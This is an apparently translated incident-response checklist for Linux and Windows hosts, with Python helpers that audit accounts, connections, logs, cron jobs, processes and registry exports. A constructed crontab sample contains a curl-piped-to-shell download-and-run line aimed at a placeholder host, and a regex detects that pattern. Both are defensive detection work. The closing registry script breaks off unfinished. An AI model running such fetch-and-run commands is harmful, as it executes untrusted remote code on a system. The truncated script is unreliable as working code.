Linux and Windows emergency response: key items to examine

Linux emergency response: key items to examine

User account audit: cat /etc/passwd and cat /etc/shadow

Logged-in user audit: w

Login history audit: last

Empty-password account audit: awk -F: '($2 == "") {print $1}' /etc/shadow

Hosts must not be configured to allow accounts with empty passwords. Even where no way to abuse an empty-password account has been found yet, such accounts violate the basic principles of the classified protection baseline.

Privileged account audit: awk -F: '($3 == 0) {print $1}' /etc/passwd

On Linux, root is normally the only privileged (UID 0) account. Any other account with UID 0 is a definite risk and is most likely a backdoor account created by an attacker.
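As an added example (not part of the original post), the two awk checks above expressed as a small Python script that runs over constructed sample copies of /etc/passwd and /etc/shadow. On a real host the same functions would be fed the actual files (reading /etc/shadow requires root); the sample contents and account names are constructed.

```python
# Added example (not from the original post): audit /etc/passwd and /etc/shadow
# for empty-password accounts and for UID-0 accounts other than root.
# SAMPLE_PASSWD and SAMPLE_SHADOW are constructed sample file contents.

# Constructed /etc/passwd: name:x:uid:gid:gecos:home:shell
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/tmp:/bin/bash
"""

# Constructed /etc/shadow: name:hash:lastchg:min:max:warn:inactive:expire:reserved
SAMPLE_SHADOW = """\
root:$6$abc$hashedvalue:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice::19000:0:99999:7:::
sysadm:!:19000:0:99999:7:::
"""


def _records(text, min_fields):
    """Yield colon-separated records, skipping blank and malformed lines."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            yield fields


def empty_password_accounts(shadow_text):
    """Same check as: awk -F: '($2 == "") {print $1}' /etc/shadow
    Locked accounts ('*' or '!') are not empty passwords and are not reported."""
    return [f[0] for f in _records(shadow_text, 2) if f[1] == ""]


def privileged_accounts(passwd_text):
    """Same check as: awk -F: '($3 == 0) {print $1}' /etc/passwd"""
    return [f[0] for f in _records(passwd_text, 3) if f[2] == "0"]


def audit_accounts(passwd_text, shadow_text):
    """Combine both checks; any UID-0 account besides root is a finding."""
    return {
        "empty_password": empty_password_accounts(shadow_text),
        "extra_uid0": [n for n in privileged_accounts(passwd_text) if n != "root"],
    }


if __name__ == "__main__":
    # On a live host (as root):
    #   audit_accounts(open("/etc/passwd").read(), open("/etc/shadow").read())
    for kind, names in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{kind}: {names}")
```

Only a genuinely empty second field in /etc/shadow means logon without a password; the script therefore leaves locked accounts (`*` or `!`) out of the empty-password list, which is the same behaviour as the awk one-liner.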

Process audit: ps -ef (full-format listing of all processes) or ps auxfww (all processes with their complete command lines)

Process auditing is one of the key concerns of Linux emergency response. Most security incidents involve a malicious process running on the system, and tracing and analysing processes is an essential incident-response skill.

Port and associated process audit: lsof -p PID or lsof -i :PORT

Malicious processes on Linux usually bind a socket to open a local port and communicate externally, so when a process is suspected, correlate it with the ports it has open.

Network connection audit: netstat -ano | grep ESTABLISHED (established connections) or netstat -antlp | grep LISTEN (ports in the LISTEN state)

Network connections are also a focus of emergency response: check the "Foreign Address" column for malicious IPs (using a third-party IP reputation database), check the connection state, and check whether any socket looks abnormal.
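An added example, not from the original post: parsing constructed `netstat -antp` output to list listening ports with their owning process and to flag ESTABLISHED connections whose foreign address is outside the internal ranges or appears on a reputation list. The BAD_IPS set stands in for the third-party IP reputation database mentioned above and is constructed, as is the sample output (documentation addresses are used; only RFC 1918, loopback and link-local ranges count as internal here).

```python
# Added example (not from the original post): parse Linux `netstat -antp`
# output, list listening ports with their owning process, and flag ESTABLISHED
# connections to external addresses or to addresses on a reputation blocklist.
# SAMPLE_NETSTAT and BAD_IPS are constructed for illustration.
import ipaddress

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2231/.x
tcp        0      0 10.0.0.5:22             10.0.0.9:51234          ESTABLISHED 1502/sshd: alice
tcp        0      0 10.0.0.5:45120          203.0.113.7:6667        ESTABLISHED 2231/.x
tcp        0      0 10.0.0.5:45121          198.51.100.20:443       ESTABLISHED 1900/curl
"""

# Stand-in for a third-party IP reputation feed (constructed, not a real feed).
BAD_IPS = {"203.0.113.7"}

# Ranges treated as "internal"; everything else counts as external.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def parse_netstat(text):
    """One dict per tcp line; the PID/Program column may itself contain spaces."""
    conns = []
    for line in text.splitlines():
        parts = line.split(None, 6)
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6"):
            continue  # header lines and non-tcp rows
        proto, _recvq, _sendq, local, foreign, state = parts[:6]
        pid, _, prog = (parts[6] if len(parts) > 6 else "-").partition("/")
        lhost, _, lport = local.rpartition(":")
        fhost, _, fport = foreign.rpartition(":")
        conns.append({"proto": proto, "local_host": lhost, "local_port": lport,
                      "foreign_host": fhost, "foreign_port": fport,
                      "state": state, "pid": pid, "program": prog})
    return conns


def listening_ports(conns):
    """Map listening port -> program name (what netstat -antlp | grep LISTEN shows)."""
    return {int(c["local_port"]): c["program"] for c in conns if c["state"] == "LISTEN"}


def _is_external(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not any(ip in net for net in _INTERNAL_NETS)


def flag_connections(conns, bad_ips=BAD_IPS):
    """(pid, program, foreign address, reasons) for suspicious ESTABLISHED sockets."""
    findings = []
    for c in conns:
        if c["state"] != "ESTABLISHED":
            continue
        reasons = []
        if c["foreign_host"] in bad_ips:
            reasons.append("foreign address on reputation blocklist")
        if _is_external(c["foreign_host"]):
            reasons.append("connection to external address")
        if c["program"].startswith("."):
            reasons.append("hidden program name")
        if reasons:
            findings.append((c["pid"], c["program"],
                             f'{c["foreign_host"]}:{c["foreign_port"]}', reasons))
    return findings


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_ports(conns))
    for pid, prog, remote, why in flag_connections(conns):
        print(f"PID {pid} ({prog}) -> {remote}: {', '.join(why)}")
```

Each flagged PID is the value to feed into `lsof -p PID` from the port audit above; a reputation hit and a hidden program name on the same socket is the combination that deserves attention first.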

Scheduled task audit: crontab -l

Scheduled tasks on Linux are generally run through cron. Attackers modify cron either to maintain their access (periodically checking that it still works) or to run malicious jobs on a schedule, such as DDoS bot activity.

System status audit: top

Trojans and similar programs have a measurable effect on the system's CPU, memory, disk I/O and network I/O.

ARP table audit: arp -a

ARP is the Address Resolution Protocol; the ARP table records the mapping between MAC addresses and IP addresses on the Linux system. Attackers often carry out man-in-the-middle attacks by modifying ARP mappings.

Linux log audit:

  1) /var/log/messages or /var/log/syslog: system activity log

    Search it for squid (proxy) activity records.

    

2) /var/log/auth.log: system authorization and authentication log

   Search for failed authentications and correlate them with the source IP to identify brute-force attacks.

   

   Search for the keyword "incomplete message" to identify OpenSSH username enumeration attacks.

   

3) /var/log/secure: mainly used for tracking system authorization; it stores all security-related messages, including sudo records, SSSD (System Security Services Daemon) records, SSH logins and other error messages.

   Look at the pam_unix session-open records (PAM is the Linux dynamically loaded authentication module).
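An added example, not from the original post, covering the three checks described for /var/log/auth.log and /var/log/secure: counting failed SSH authentications per source IP to spot brute forcing (and whether that source later succeeded), grepping for the "incomplete message" keyword, and extracting the pam_unix session-open records. The log lines are constructed in the usual syslog format; the threshold of five failures is an assumption for the example.

```python
# Added example (not from the original post): scan auth.log / secure text for
# brute-force sources, "incomplete message" lines and pam_unix session opens.
# SAMPLE_AUTH_LOG is constructed for illustration.
import re
from collections import Counter

SAMPLE_AUTH_LOG = """\
Mar  3 10:01:02 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51102 ssh2
Mar  3 10:01:04 web01 sshd[2212]: Failed password for root from 203.0.113.7 port 51104 ssh2
Mar  3 10:01:05 web01 sshd[2214]: Failed password for root from 203.0.113.7 port 51106 ssh2
Mar  3 10:01:06 web01 sshd[2216]: Failed password for invalid user oracle from 203.0.113.7 port 51108 ssh2
Mar  3 10:01:07 web01 sshd[2218]: Failed password for invalid user test from 203.0.113.7 port 51110 ssh2
Mar  3 10:02:11 web01 sshd[2230]: Failed password for alice from 10.0.0.9 port 40011 ssh2
Mar  3 10:02:20 web01 sshd[2230]: Accepted password for alice from 10.0.0.9 port 40011 ssh2
Mar  3 10:02:20 web01 sshd[2230]: pam_unix(sshd:session): session opened for user alice by (uid=0)
Mar  3 10:05:40 web01 sshd[2300]: fatal: incomplete message [preauth]
Mar  3 10:06:00 web01 sshd[2310]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar  3 10:07:00 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted \S+ for (\S+) from (\S+) port \d+")
SESSION_RE = re.compile(r"pam_unix\(\S+:session\): session opened for user (\S+)")


def failed_logins_by_ip(log_text):
    """Count failed SSH authentications per source IP (insertion order kept)."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            counts[m.group(2)] += 1
    return counts


def brute_force_sources(log_text, threshold=5):
    """(ip, failures, later_succeeded) for sources with >= threshold failures."""
    failed = failed_logins_by_ip(log_text)
    succeeded = {m.group(2) for line in log_text.splitlines()
                 for m in [ACCEPTED_RE.search(line)] if m}
    return [(ip, n, ip in succeeded) for ip, n in failed.items() if n >= threshold]


def enumeration_hits(log_text):
    """Lines carrying the 'incomplete message' keyword from the text above."""
    return [l for l in log_text.splitlines() if "incomplete message" in l]


def session_opens(log_text):
    """Users for whom pam_unix opened a session, in log order."""
    return [m.group(1) for line in log_text.splitlines()
            for m in [SESSION_RE.search(line)] if m]


if __name__ == "__main__":
    # On a live host: brute_force_sources(open("/var/log/auth.log").read())
    print("brute force:", brute_force_sources(SAMPLE_AUTH_LOG))
    print("enumeration:", enumeration_hits(SAMPLE_AUTH_LOG))
    print("sessions:", session_opens(SAMPLE_AUTH_LOG))
```

A source that crosses the failure threshold and then appears in an "Accepted" line is the case to escalate: the brute force succeeded, and the matching pam_unix session-open record gives the account that was taken over.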

   

4) /var/log/boot.log: log of system boot information

   Security incidents rarely touch this log, except for the few viruses and Trojans that tamper with the MBR.

5) /var/log/dmesg: kernel ring buffer messages, recording hardware device and driver information

  This kind of log is hard to analyse and easy to overlook.

6) /etc/crontab: scheduled tasks, containing periodic job information

 This file is easily tampered with by attackers to run scripts through scheduled tasks, for example a script executed on the server once a minute to check that their access persists.
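An added example, not from the original post, serving both the crontab -l check under "Scheduled task audit" above and the /etc/crontab entry here: a parser for both crontab layouts (the system file carries an extra user column) followed by the persistence heuristics the text describes, i.e. jobs that run every minute or at every boot, jobs launched from a temp or hidden directory, and jobs that download something and pipe it into a shell. Both crontab samples are constructed; example.invalid is a placeholder host.

```python
# Added example (not from the original post): parse `crontab -l` output and
# /etc/crontab, then flag entries matching common persistence patterns.
# SAMPLE_USER_CRONTAB and SAMPLE_SYSTEM_CRONTAB are constructed.
import re

# Constructed: output of `crontab -l` for one user (5 schedule fields + command)
SAMPLE_USER_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/.x/check.sh
"""

# Constructed: /etc/crontab (5 schedule fields + user + command)
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root curl -s http://example.invalid/a.sh | sh
"""

FIELDS = ("minute", "hour", "dom", "month", "dow")
# /tmp, /var/tmp, /dev/shm, or any hidden directory component such as /.x/
SUSPICIOUS_PATH = re.compile(r"(^|[\s=])/(tmp|dev/shm|var/tmp)/|/\.[^/\s]+/")
# "curl ... | sh" style download-and-execute
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")


def parse_crontab(text, system_file=False):
    """Return entries as dicts; system_file=True expects the extra user column."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank lines, comments and VAR=value assignments
        if line.startswith("@"):  # @reboot, @hourly ... : one special field
            n = 2 if system_file else 1
            parts = line.split(None, n)
            if len(parts) < n + 1:
                continue
            schedule, rest = {"special": parts[0]}, parts[1:]
        else:
            n = 6 if system_file else 5
            parts = line.split(None, n)
            if len(parts) < n + 1:
                continue
            schedule, rest = dict(zip(FIELDS, parts[:5])), parts[5:]
        entries.append({"schedule": schedule,
                        "user": rest[0] if system_file else None,
                        "command": rest[-1]})
    return entries


def audit_cron(entries):
    """Return (command, reasons) for entries matching the persistence heuristics."""
    findings = []
    for e in entries:
        reasons, sched, cmd = [], e["schedule"], e["command"]
        if sched.get("minute") == "*" or sched.get("special") == "@reboot":
            reasons.append("runs every minute or at every boot")
        if SUSPICIOUS_PATH.search(cmd):
            reasons.append("runs from a temp or hidden directory")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("downloads and pipes into a shell")
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    entries = (parse_crontab(SAMPLE_USER_CRONTAB)
               + parse_crontab(SAMPLE_SYSTEM_CRONTAB, system_file=True))
    for cmd, why in audit_cron(entries):
        print(f"{cmd!r}: {', '.join(why)}")
```

The same parser applies to the per-user files under /var/spool/cron and to the drop-in files in /etc/cron.d (which use the system layout with the user column); the heuristics are a triage aid and every hit still needs the referenced script read before it is judged malicious.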


Windows emergency response: key items to examine

Related glossary:

1. Windows domain (Domain):

           A domain (Domain) is an independently operating unit of a Windows network. Access between domains requires a trust relationship (Trust Relation), which acts as a bridge between one domain and another. Once a domain has established trust relationships with other domains, the two domains can not only be managed jointly as needed, but can also share files, printers and other network resources across devices, so that resources in different domains can be shared and managed together and the domains can communicate and transfer data with each other.

By running the command

2. Domain Controller (Domain controller)

          In "domain" mode, at least one server is responsible for registering and verifying every computer and user that joins the network; it acts as the guard of the unit and is called the domain controller. The domain controller holds a database containing the domain accounts, passwords, the computers belonging to the domain and other information. When a computer connects to the network, the domain controller first checks whether the computer belongs to the domain, whether the account the user is logging on with exists, and whether the password is correct. If any of this information does not match, the domain controller rejects the user's logon from that computer. Unable to log on, the user has no access to the resources protected on the server and can only access resources shared by other Windows computers as a peer, which protects the resources on the network to some extent.

3. Command Prompt

          The Windows command prompt is a program for interacting with the operating system through commands: it passes commands to the operating system, which executes them and returns its feedback. It is similar to Microsoft's DOS operating system.

4. PowerShell

           PowerShell can be seen as an upgraded version of the command prompt. It provides API access to system variables and functions, offers more operations, and supports .NET programming.

5. .NET

           .NET is Microsoft's next-generation technology platform for building interconnected, business-agile applications; these systems are standards-based, interconnected, adaptable to change, stable and high-performance. From a technical angle, a .NET application is an application that runs on the .NET Framework. (More precisely, a .NET application is one written with the .NET Framework Class Library and run on top of the Common Language Runtime.) An application that has nothing to do with the .NET Framework cannot be called a .NET program. For example, an application that only uses XML is not a .NET application, and one that only calls a Web Service through the SOAP SDK is not a .NET application either. The .NET platform is based on the Windows operating system and is used for distributed applications on the Internet.

6. Batch (batch)

           A batch (Batch) is also called a batch script. As the name suggests, batch processing means processing a set of objects together; it is usually regarded as a simplified scripting language used on DOS and Windows systems. The extension of a batch file is .bat. Two common kinds of batch exist today: DOS batch and PS batch. PS batch is based on the powerful image-editing software Photoshop and is used to batch-process pictures; DOS batch is a script based on DOS commands that executes DOS commands in bulk to carry out specific operations. In more complex cases, commands such as if, for and goto are needed to control program flow, as in C, Basic and other high-level languages. For more complex applications an external program is needed, which may be an external command or tool provided by the system itself or software provided by a third party. Although batch programs run in the command-line environment, they are not limited to command-line software: any program that can run on the current system can be placed in a batch file and run.

7. Scripting language (script)

         Scripting languages were created to shorten the traditional edit-compile-link-run cycle of programming languages. The name comes from "screenplay": each run repeats the dialogue verbatim. Early scripting languages were often called batch languages or job control languages.

A script is usually interpreted rather than compiled. Scripting languages are typically simple, easy to learn and easy to use, with the aim of letting programmers finish writing a program quickly. Macro languages can be regarded as a branch of scripting languages; the two have substantial similarities.

8. Registry (Registry; the Traditional Chinese edition of Windows uses a different name for it)

         The Microsoft Windows registry is an important database for storing configuration information of the system and of applications. The registry appeared as early as the introduction of OLE technology in Windows 3.0. Windows NT, launched afterwards, was the first system to use the registry widely at the operating-system level. It was with Microsoft Windows 95, however, that the registry really became something Windows users came into contact with regularly, and it has continued to be used in subsequent operating systems up to today.

9. Process (process)

         A process (Process) is a running activity of a computer program over some set of data; it is the basic unit of resource allocation and scheduling in the system and the foundation of the operating system architecture. In early process-oriented computer architectures, the process was the basic execution entity of a program; in contemporary thread-oriented architectures, the process is the container of threads. A program describes instructions and the organisation of data; the process is the program actually executing.

10. Shared folder (share)

         A shared folder is a folder that one computer makes available to other computers; "sharing" simply means making it available for common use.

11. Startup item

         Startup items are the programs that run in the foreground or background when the system boots. By the time the operating system finishes the logon process, a large number of processes already appear in the process table, because the operating system loads many programs automatically at boot. It is an indisputable fact that many auto-started programs bring us convenience, but not every auto-started program is one we use; worse, a virus or Trojan may be among the startup items.

12. Buffer overflow

         A buffer overflow (buffer overflow) exploits a program design flaw: content is written into the program's input buffer so that it overflows (usually by exceeding the maximum amount of data the buffer can store), thereby corrupting the program's execution and giving the attacker the opportunity, when the program is interrupted, to gain control over the program and the system.

13. Interrupt

        An interrupt means that while the computer is running, some unexpected situation arises that requires the host's intervention; the machine automatically stops the running program and transfers to a program that handles the new situation, and after handling it returns to the suspended program, which continues to run.

14. API

        An API (Application Programming Interface) is a set of predefined functions that gives application developers the ability to access a set of routines based on some software or hardware without having to access the source code or understand the details of its inner workings.

15. Communication port

        With the development of computer network technology, the original physical interfaces (for example the input/output interfaces of the keyboard, mouse, network card and display card) could no longer meet the requirements of network communication, and the TCP/IP protocol, as the standard protocol for network communication, was introduced to solve this problem. The TCP/IP protocol was integrated into the operating system kernel, which amounted to introducing a new input/output interface technology into the operating system, because TCP/IP brought with it an application programming interface called the "Socket". With this Socket interface technology, a computer can communicate by software with any computer that has a Socket interface. In computer programming, a port is this "Socket interface".

16. Worm

       A worm is a common kind of computer virus. It uses the network to replicate and spread, infecting through the network and e-mail. The original definition of the worm virus comes from the DOS environment, where the virus produced something like a worm on the screen, randomly devouring letters on the screen and changing their shape. A worm is a self-contained program (or set of programs) that can propagate copies of itself, or of some of its functional parts, to other computer systems (usually via a network connection).

17. Trojan

      A Trojan (Trojan), also called a Trojan horse, is a specific program (a Trojan horse) used to control another computer. A Trojan usually consists of two executable programs: one is the controlling end, the other is the controlled end. The name comes from the ancient Greek legend of the Trojan horse (the story of the Trojan Horse in Homer; the term "Trojan" originally referred to Troy and stands for the Trojan horse of that story).

A "Trojan horse" program is currently the more popular kind of virus file. Unlike ordinary viruses, it does not reproduce itself and does not "deliberately" infect other files; instead, it disguises itself to attract users to download and execute it, opening a door into the infected host for the Trojan's operator, who can then destroy or steal files on the host, or even remotely control it.

18. Threat intelligence

      What is threat intelligence? The security community has in fact been using it all along: vulnerability databases, fingerprint databases, IP reputation databases and threat intelligence platforms are all part of threat intelligence. Intelligence consists of clues, and threat intelligence means reconstructing attacks that have already happened and predicting attacks that have not yet occurred from those clues, as needed. "So-called threat intelligence is the knowledge that helps us identify threats and handle them accordingly. This knowledge is what we call threat intelligence."

19. System services

        System services (system services) are programs, routines or processes that perform specified system functions in order to support other programs, particularly low-level (close to the hardware) programs. When services are provided over the network, they can be published in Active Directory (AD) to promote service-centred management and use.

20. AD (Active Directory)

        AD, or Active Directory, is the directory service of the Windows Server operating systems. Active Directory provides a set of centrally organised management and directory services for accessing network resources. It can centrally manage access to network resources and allows users to log on once to access all the resources they are entitled to in Active Directory.

21. Virus signature

       A code segment whose characteristics can be used to classify a virus. Typically the virus executable is disassembled, distinctive assembly code is located, and its hexadecimal machine code is then taken as the signature value.

22. Reverse engineering (also called reverse technology)

       Reverse engineering is the reproduction of a product's design: a target product is studied and analysed in reverse to deduce and work out its processing flow, organisational structure, functional characteristics and technical specifications, so that a product with similar but not identical functions can be produced. Reverse engineering originated in the analysis of hardware in the commercial and military fields. Its main purpose is to derive a product's design principles directly from analysis of the product when the information needed to produce it cannot be obtained easily.

1. User account and group audit

  1) Description: Attackers often add backdoor accounts to the system after an intrusion, so users and groups need to be audited for signs of tampering.

  2) Command: lusrmgr.msc

  3) What to check: check whether suspicious user names have been created and whether suspicious accounts have been added to the Administrators group.

   

2. Startup configuration audit

  1) Description: Attackers can modify the startup configuration so that a custom script is loaded automatically after the system starts.

  2) Command: msconfig.exe or wmic startup list full

  3) What to check: check the information on each startup program; applications started from unusual locations can be checked with the 360 removal tool.

  

3. Abnormal process audit

  1) Description: Processes are often one of the main concerns of emergency response. Attackers keep their external communication channel open in a separate process on the compromised host, and the process name is often deceptive, for example svch0st.exe (should be svchost.exe) or exp1orer.exe (should be explorer.exe).

  2) Command: the Processes tab of taskmgr.exe, or tasklist.exe

  3) Inspection method: carefully examine the system processes that Trojans are likely to imitate, locate the process's file on disk and scan it with the 360 anti-virus tool; for other processes you are unsure about, look the name up on Google to obtain threat intelligence on the probability that the program is malicious.
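An added example, not from the original post: a check over a process list of the kind `tasklist` or `wmic process get name,executablepath` produces, which finds names that imitate core Windows processes (the svch0st.exe and exp1orer.exe cases above, plus one-character typos) and genuine system process names that are running from a directory they do not normally run from. The KNOWN_PROCESSES table, its allowed directories and the SAMPLE_PROCESSES list are constructed assumptions for the example.

```python
# Added example (not from the original post): spot look-alike names of core
# Windows processes and system process names running from unexpected paths.
# KNOWN_PROCESSES (with allowed directories) and SAMPLE_PROCESSES are
# constructed assumptions for this example.

# Known system process -> directories it legitimately runs from (assumption)
KNOWN_PROCESSES = {
    "svchost.exe": ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\"),
    "explorer.exe": ("c:\\windows\\",),
    "lsass.exe": ("c:\\windows\\system32\\",),
    "csrss.exe": ("c:\\windows\\system32\\",),
    "winlogon.exe": ("c:\\windows\\system32\\",),
    "services.exe": ("c:\\windows\\system32\\",),
}

# Constructed sample (name, executable path) as wmic would report them
SAMPLE_PROCESSES = [
    ("svchost.exe", "C:\\Windows\\System32\\svchost.exe"),
    ("svch0st.exe", "C:\\Users\\Public\\svch0st.exe"),
    ("exp1orer.exe", "C:\\ProgramData\\exp1orer.exe"),
    ("explorer.exe", "C:\\Windows\\explorer.exe"),
    ("lsass.exe", "C:\\Windows\\System32\\lsass.exe"),
    ("svchost.exe", "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe"),
    ("notepad.exe", "C:\\Windows\\System32\\notepad.exe"),
]

# Characters commonly swapped in for letters, mapped back to the letter they imitate
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "5": "s", "|": "l"})


def _normalize(name):
    return name.lower().translate(HOMOGLYPHS)


def _levenshtein(a, b):
    """Edit distance; names are short, so the plain DP table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name, known=KNOWN_PROCESSES):
    """Return the system process this name imitates, or None if exact or unrelated."""
    lname = name.lower()
    if lname in known:
        return None
    for k in known:
        if _normalize(lname) == k or _levenshtein(lname, k) == 1:
            return k
    return None


def audit_processes(processes, known=KNOWN_PROCESSES):
    """Return (name, path, reason) findings for the process list."""
    findings = []
    for name, path in processes:
        lname, lpath = name.lower(), path.lower()
        target = lookalike_of(name, known)
        if target:
            findings.append((name, path, f"name imitates {target}"))
        elif lname in known and not any(lpath.startswith(d) for d in known[lname]):
            findings.append((name, path, "system process name running from unexpected directory"))
    return findings


if __name__ == "__main__":
    for name, path, reason in audit_processes(SAMPLE_PROCESSES):
        print(f"{name:14} {path:50} {reason}")
```

The path check is what catches the case the name check cannot: a file really called svchost.exe dropped in a user's Temp directory has a perfect name and is found only because a genuine svchost.exe never runs from there.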

  

4. Abnormal service audit

  1) Description: Windows services are similar to Linux daemons. Attackers create custom services so that their malicious program keeps persistent control of the compromised host.

  2) Command: services.msc

  3) Inspection method: know the standard Windows system services and recognise the service names viruses commonly create, such as names containing keywords like "xxxUpdate". Tip: open the properties of a given system service and read its description; a service with little or no description, or with unofficial-sounding wording, tends to be more suspicious. Also look at the dependencies: services that use RPC (Remote Procedure Call) deserve particular attention.

  

5. Scheduled task audit

  1) Description: Scheduled tasks are a set of operations the computer performs periodically. Attackers also add custom scheduled tasks, for example to check a connection heartbeat or to launch DoS attacks.

  2) Command: schtasks.exe, or the GUI under Control Panel > Scheduled Tasks

  3) Inspection method: know the tasks that come with the system, view the folder corresponding to each task, and compare the task's creation time, the file it launches and other information to determine whether the task is malicious.

  

6. System running state audit

  1) Description: Trojans and viruses cause abnormally high CPU, memory, disk read/write and network I/O usage, so potentially malicious programs can be found by monitoring the system state.

  2) Command: taskmgr.exe

  3) What to check: on the Performance tab of Task Manager, track CPU, memory, disk and network usage over a period of time, and use Resource Monitor alongside it for inspection.

  

6. User session audit

  1) Description: An attacker who logs on via RDP (port 3389) creates a user logon session on the system; auditing sessions shows whether an attacker has logged on remotely.

  2) Command: query user

  3) Inspection method: run the command and check whether any session is abnormal and whether a suspicious user has a session open.

  

7. Network connection audit

  1) Description: Auditing network connection information reveals the attacker's source IP, open ports, the associated processes and so on.

  2) Command: netstat -ano

  3) Inspection method: run the command and check for suspicious external IPs in the "ESTABLISHED" state.

  

8. Local share audit

  1) Description: Classic early attacks used IPC$ to implant bots in bulk.

  2) Command: net share and net use

  3) What to check: net share shows which local shares are open; net use shows whether any network connection has been mapped.

  

9. Group Policy audit

  1) Description: Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user and computer accounts. It provides centralised management and configuration of the operating system, applications and user settings in an Active Directory environment. A version called Local Group Policy (abbreviated "LGPO" or "LocalGPO") allows Group Policy to be managed on standalone, non-domain computers.

  2) Command: gpedit.msc

  3) Inspection method: open the Group Policy panel and focus on the Scripts submenus under Computer Configuration and User Configuration; check whether any PowerShell script is loaded and analyse the script content to determine whether it is abnormal.

  

 

10. Log audit

  1) Description: Windows logs include the system log, the security log and the application log, and are usually queried through the built-in Windows Event Viewer.

  2) Command: eventvwr

  3) Inspection method: open the Windows Event Viewer and filter the logs by the time interval in which the security incident occurred. Focus on the "Security" and "Application" logs, since most commands executed by attackers are recorded in these two logs.

  

 The built-in Windows log viewer is not very friendly and does not lend itself to analysis, so the 32- or 64-bit log analysis tool LogParser.exe is usually used instead; it can be downloaded from the corresponding Microsoft official website. After installation, log information can be queried as if it were a database.

  

  Because the default log path C:\Windows\System32\winevt\Logs\ often causes problems, copy the log files to the root of the C: drive for analysis.

  

10. Registry audit

  1) Description: The Windows registry is a database that stores configuration information for the system and for applications, organised as key/value pairs.

  2) Command: regedit.exe

  3) What to check: run the command to open the registry editor, then inspect the registry keys under the specified paths manually or with anti-virus software.

  For example:

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: see which programs start automatically with the system.

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: check the EnableLUA value (0: UAC disabled, 1: UAC enabled).

  

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager: check whether ExcludeFromKnownDlls exists; if it does and its value contains lpk.dll, usp10.dll, msimg32.dll, midimap.dll, ksuser.dll, comres.dll or ddraw.dll, treat it as abnormal.
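An added example, not from the original post: the three registry checks above applied to a `reg export` (.reg) file rather than by hand in regedit, which is how they are usually run when the hive has been exported from the affected machine. The parser handles string, dword and hex(7) (REG_MULTI_SZ, UTF-16LE) values and the backslash line continuation that reg export uses for long data. SAMPLE_REG is a constructed export, not taken from a real system, and TRUSTED_DIRS is an assumption about where autostart entries normally point.

```python
# Added example (not from the original post): parse a `reg export` file and
# apply the three checks from the text: Run-key programs, EnableLUA, and the
# ExcludeFromKnownDlls list under Session Manager. SAMPLE_REG is constructed.
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Users\\Public\\svch0st.exe -k"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"ExcludeFromKnownDlls"=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,\
  00,00
"""

# DLL names the text lists as abnormal when found in ExcludeFromKnownDlls
SUSPECT_KNOWNDLLS = {"lpk.dll", "usp10.dll", "msimg32.dll", "midimap.dll",
                     "ksuser.dll", "comres.dll", "ddraw.dll"}
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
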